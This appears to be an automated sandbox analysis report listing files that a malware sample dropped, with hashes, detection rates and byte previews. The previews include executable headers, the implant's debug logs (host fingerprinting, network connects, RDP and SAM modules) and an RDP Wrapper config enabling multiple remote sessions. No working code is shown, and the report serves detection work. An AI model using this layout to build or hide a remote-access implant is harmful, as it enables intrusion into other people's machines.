                                  SSDEEP:12:TV3PqV3PqV3PqV3PqV3PqV3PqV3PqV3PqV3PqV33uQc5Vwgud:TV3CV3CV3CV3CV3CV3CV3CV3CV3CV3eq
                                  MD5:68A2AAF4D66EF76254B9793978FC5BAF
                                  SHA1:16CD7BEDA3381490889DB8D2C29B5B5FE745D14A
                                  SHA-256:C4A019104177864D0DF038C49F136FBC855EE70F3454B01600A5A3BCF04ABA2C
                                  SHA-512:6D569BC7CCD23F28E18A42A0843DCD2DE0ACEE07646CCBB137CBFF219F32771BAD40E1D6D96CEB384BCE6866FF4E9434711AE20185B870D2EABA5F91C9A9DAEE
                                  Malicious:false
                                  Preview:lJ...&.R.j.?gY...u........4w.....)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_ZC..^..q...F.......P..~kn4...9...............hB.Q...r'.Hd.....fk..7.z<......E....!v..0D.@'...A.
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:OpenPGP Secret Key
                                  Category:dropped
                                  Size (bytes):96
                                  Entropy (8bit):6.256735677759421
                                  Encrypted:false
                                  SSDEEP:3:cw08J8pfuH+JPVrXKj6C5plQuuAVXfh:cB8uGe1VrXKj6OplQuuWp
                                  MD5:99091C5B8F4818778AFAE130FF71481C
                                  SHA1:D1C18A8BF6CA7005E2CEB5A27BCF09C68CDB5F56
                                  SHA-256:619212AC75225A30AB31125BD4CE62C400D7D9E124A9238933BE18D89E7E5DD6
                                  SHA-512:369AA9012C960EEF37D8B274CC89F952B1A1EFFB6E26249141B9C9BFAF78A0E4F59462FF8F4409A6CC31E3F411E4C215A01A5361E93285FFFF955A29C1EBD281
                                  Malicious:false
                                  Preview:...{JQ....C...X~z.`Xo......._..Z.p-..$..n.v/.......m.u}....vI.@^1.......@...u....."]..}.U..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):9146880
                                  Entropy (8bit):6.674868432808522
                                  Encrypted:false
                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):89088
                                  Entropy (8bit):6.229509810228039
                                  Encrypted:false
                                  SSDEEP:1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
                                  MD5:4E320E2F46342D6D4657D2ADBF1F22D0
                                  SHA1:A5ACFE6397DFFC61D243206885C389EA05428755
                                  SHA-256:7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
                                  SHA-512:E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 11%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4672
                                  Entropy (8bit):5.346929508396374
                                  Encrypted:false
                                  SSDEEP:96:idHwWdJ9VjyHzHH0Hf0HaSHRmHu5SHSapmHSm5SHr8mHOn5SHfSHbmHX5SHfmHHq:Az3TWTn0/06SIO5SVAz5SLnc5S/SS35c
                                  MD5:C64B5D0247AE347E1282197C83BEACBE
                                  SHA1:5B3CB234F5DD2329B373AF301C9C5CE6749AAE62
                                  SHA-256:1EBAECAB1A967F0762410199A24FC9A36D1F4AF83504515B9F1D8FE32E130196
                                  SHA-512:A4431AC2D3A4C8BFEE3D893A2C4490E3D7151E55ABCE1A60ABA193FA5ACB85407BD42DFC7E0A7A767A8EED984AA389979BEA13870B0FB8B74BD5680771B4E145
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):105984
                                  Entropy (8bit):6.2884725801282775
                                  Encrypted:false
                                  SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                  MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                  SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                  SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                  SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1167
                                  Entropy (8bit):5.5035060062410395
                                  Encrypted:false
                                  SSDEEP:24:CFAGHr5lGyclY7GfyE7Bf7cRE9FLxJN4Jw0ERBXYfHeAOp:CFdHr54yclD7hcm9FLZ4WNGeD
                                  MD5:2FD6406BE7DAB0162F0D1730855E7427
                                  SHA1:83D19EEF6215E54DD1293918C570B00EE95D0B00
                                  SHA-256:B1EC3A8D723B11A58292E8BADEA469CD657034879A3D206EDB92031D822844D9
                                  SHA-512:1286EDCDEC7E72D3BC457A7F599A5267268133AA221AECF6E23C220E5BEA030B39796F099C065BB48E80CF636CDE04C8BD649EF2FFCB7ECD0F6330E925C5D467
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb22769d36)..[I] (tcp_connect) -> Done(sock=0x358,host=7
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):129024
                                  Entropy (8bit):6.313152038164236
                                  Encrypted:false
                                  SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                  MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                  SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                  SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                  SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1354
                                  Entropy (8bit):5.501893800293231
                                  Encrypted:false
                                  SSDEEP:24:CFAGH75lGyclY7GfyE7Bf7cRE9FLxJN4Jw0dk1RDobXY1zYcRAENmMeAOp:CFdH754yclD7hcm9FLZ4W+JcLMMeD
                                  MD5:0E38F5C21FA0EDEB4572E2E9003AC989
                                  SHA1:4F4C26851C0EBE18681903263CEBF8114D1F1C34
                                  SHA-256:0CB7C4B55F53EB2678274380D61845FF0F65C5DDAD3966BE0346CB8AA3EDB233
                                  SHA-512:7C8E1A09FCFD2CA24AD7A9695F776AF8BB34F32963CEF680D3DB8CC87EFD9BD66C34FD1B105CB54497F5EC1F24905CED420412C8230AE0A3833FF3DBA45193BE
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb2273
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):37376
                                  Entropy (8bit):5.7181012847214445
                                  Encrypted:false
                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115712
                                  Entropy (8bit):6.277217301921545
                                  Encrypted:false
                                  SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                  MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                  SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                  SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                  SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):2069
                                  Entropy (8bit):5.46905637754495
                                  Encrypted:false
                                  SSDEEP:48:CFdHr+54yclD7hcm9FLZ4WlV5ZR5+sR55L+5HR5ik85OKQeD:idHxNdJ9VjFD
                                  MD5:B8CDE7B38E0BE506C5A6E613766F42DA
                                  SHA1:927CFDB2726EEBEBD4D0151CBB1383298EF3D207
                                  SHA-256:8933A4E45AA226869D6F4858FFE43B961E58B6457FBBB84D7A0D5603CAEFAD35
                                  SHA-512:B0BC1DDC9B1FDF4AAB9294F12DFE8780EF5FF510B76E7A4CC7A189550F1B874B21AF9A1B29D2C100357A24426715E12B91BA22B19CD459D46EA20F9F9A8F238A
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb2270e1cc)..[I] (tcp_connect) -
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):91136
                                  Entropy (8bit):6.2290767543196575
                                  Encrypted:false
                                  SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                  MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                  SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                  SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                  SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [SLPolicy]
                                  Category:dropped
                                  Size (bytes):441513
                                  Entropy (8bit):5.449545529389614
                                  Encrypted:false
                                  SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                  MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                  SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                  SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                  SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                  Malicious:false
                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):10451376
                                  Entropy (8bit):6.708065758846917
                                  Encrypted:false
                                  SSDEEP:196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
                                  MD5:312704A6232D74733DE04C6E00F8CF21
                                  SHA1:2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
                                  SHA-256:8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
                                  SHA-512:5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
                                  Malicious:false
                                  Preview:_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
